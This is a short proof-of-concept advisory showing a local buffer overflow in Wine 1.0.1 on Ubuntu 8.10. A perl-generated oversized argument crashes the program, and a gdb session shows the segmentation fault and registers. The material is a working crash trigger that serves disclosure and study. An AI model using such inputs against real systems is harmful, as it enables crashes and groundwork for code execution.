Linux Wine v1.0.1 Local Buffer Overflow (PoC)

Author : Jonathan Salwan
Mail   : submit [AT] shell-storm.org
Web    : http://www.shell-storm.org

Wine installed/tested with :
- Ubuntu 8.10 (kernel 2.6.27)
- gcc version 4.3.2 (Ubuntu 4.3.2-1ubuntu12)

Proof of Concept:
--------------------------------------------------------------------------------------
submit@submit-laptop:~$ wine --version
wine-1.0.1
submit@submit-laptop:~$ wine `perl -e "print('AAAA'x10000)"`
Erreur de segmentation
submit@submit-laptop:~$
--------------------------------------------------------------------------------------
submit@submit-laptop:~$ gdb /usr/bin/wine
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(no debugging symbols found)
(gdb) run `perl -e "print('AAAA'x10000)"`
Starting program: /usr/bin/wine `perl -e "print('AAAA'x10000)"`
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
(no debugging symbols found)
(no debugging symbols found)
[New Thread 0xb7c346b0 (LWP 11082)]
[New Thread 0xb7c33b90 (LWP 11087)]
[Thread 0xb7c33b90 (LWP 11087) exited]
[New process 11082]
Executing new program: /usr/bin/wine-preloader
(no debugging symbols found)
warning: Cannot initialize thread debugging library: generic error
warning: Cannot initialize thread debugging library: generic error
[New process 11082]

Program received signal SIGSEGV, Segmentation fault.
0x7bc42e9e in ?? ()
(gdb) i r
eax            0x110108     1114376
ecx            0x17170      94576
edx            0x410041     4259905
ebx            0x7bc8aff4   2076749812
esp            0xbfded9c0   0xbfded9c0
ebp            0xbfded9e8   0xbfded9e8
esi            0x1411d0     1315280
edi            0x158340     1409856
eip            0x7bc42e9e   0x7bc42e9e
eflags         0x10202      [ IF RF ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x33         51
gs             0x3b         59
(gdb)
--------------------------------------------------------------------------------------